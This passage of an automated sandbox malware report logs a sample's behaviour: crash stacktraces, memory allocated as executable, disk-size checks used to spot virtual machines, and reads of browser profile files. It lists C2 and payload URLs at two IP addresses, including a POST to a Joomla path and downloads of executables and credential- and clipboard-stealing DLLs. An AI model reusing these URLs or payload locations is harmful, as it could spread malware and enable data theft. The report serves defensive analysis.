0x752fd1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x752fd1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x752fd40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x752f991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x752f8d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x6b616f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x6b616e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x6b6127a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x6b612652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x6b61253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x6b612411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x6b6125ab wmic+0x39c80 @ 0x969c80 wmic+0x3b06a @ 0x96b06a wmic+0x3b1f8 @ 0x96b1f8 wmic+0x36fcd @ 0x966fcd wmic+0x3d6e9 @ 0x96d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 1763392 registers.edi: 1974991376 registers.eax: 1763392 registers.ebp: 1763472 registers.edx: 1 registers.ebx: 4610428 registers.esi: 2147746133 registers.ecx: 610425835	1
__exception__ March 30, 2023, 4:28 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 44298724 registers.edi: 2914500 registers.eax: 44298724 registers.ebp: 44298804 registers.edx: 6 registers.ebx: 44299088 registers.esi: 2147746133 registers.ecx: 2893088	1
__exception__ March 30, 2023, 4:28 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x7532c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x752f8926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x752fd55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x7532c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x752fd1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x752fd1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x752fd40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x752f991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x752f8d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x6b626f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x6b626e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x6b6227a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x6b622652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x6b62253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x6b622411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x6b6225ab wmic+0x39c80 @ 0x439c80 wmic+0x3b06a @ 0x43b06a wmic+0x3b1f8 @ 0x43b1f8 wmic+0x36fcd @ 0x436fcd wmic+0x3d6e9 @ 0x43d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 1173336 registers.edi: 1974991376 registers.eax: 1173336 registers.ebp: 1173416 registers.edx: 1 registers.ebx: 2644236 registers.esi: 2147746133 registers.ecx: 610502673	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (9 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://193.233.20.36/joomla/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://193.233.20.36/lend/123dsss.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://193.233.20.36/lend/Tarlatan.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://193.233.20.36/lend/Gmeyad.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.246.221.126/bins/2023.exe.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.246.221.126/bins/w.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://193.233.20.36/lend/tmpBEB8.tmp.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://193.233.20.36/joomla/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://193.233.20.36/joomla/Plugins/clip64.dll

Performs some HTTP requests (11 events)

request	POST http://193.233.20.36/joomla/index.php
request	GET http://193.233.20.36/lend/123dsss.exe
request	GET http://193.233.20.36/lend/Tarlatan.exe
request	GET http://193.233.20.36/lend/Gmeyad.exe
request	GET http://185.246.221.126/bins/2023.exe.exe
request	GET http://185.246.221.126/bins/w.exe
request	GET http://193.233.20.36/lend/tmpBEB8.tmp.exe
request	GET http://193.233.20.36/joomla/Plugins/cred64.dll
request	GET http://193.233.20.36/joomla/Plugins/clip64.dll
request	GET https://bitcoin.org/bin/bitcoin-core-22.0/bitcoin-22.0-win64-setup.exe
request	GET https://download.electrum.org/4.3.4/electrum-4.3.4-setup.exe

Sends data using the HTTP POST Method (1 event)

request

POST http://193.233.20.36/joomla/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 2247 events)

Time & API	Arguments	Status
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2176 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2176 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2244 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2244 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4033000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000df0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000f40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b6a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3485000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef34d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b6b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000007e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000850000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef34d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef34d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef34d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef34d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef34d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef34d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef34d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef34d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef34d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef34d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef34d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef34d4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef34d4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef34d4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef34d4000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93d3a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93dec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93df0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93d4c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1e16000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefe52d000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e61000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93d5b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93d8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 30, 2023, 4:27 p.m.	process_identifier: 2312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93d5d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (8 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW March 30, 2023, 4:27 p.m.	number_of_free_clusters: 2425918 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 30, 2023, 4:27 p.m.	number_of_free_clusters: 2425918 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 30, 2023, 4:27 p.m.	number_of_free_clusters: 2425656 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 30, 2023, 4:27 p.m.	number_of_free_clusters: 2425656 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 30, 2023, 4:27 p.m.	number_of_free_clusters: 2425446 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 30, 2023, 4:27 p.m.	number_of_free_clusters: 2425446 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 30, 2023, 4:27 p.m.	number_of_free_clusters: 2425279 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 30, 2023, 4:27 p.m.	number_of_free_clusters: 2425279 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1

Steals private information from local Internet browsers (50 out of 1564 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSoceng.store
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\101.3.34.11\manifest.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\LOG
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl\messages.json
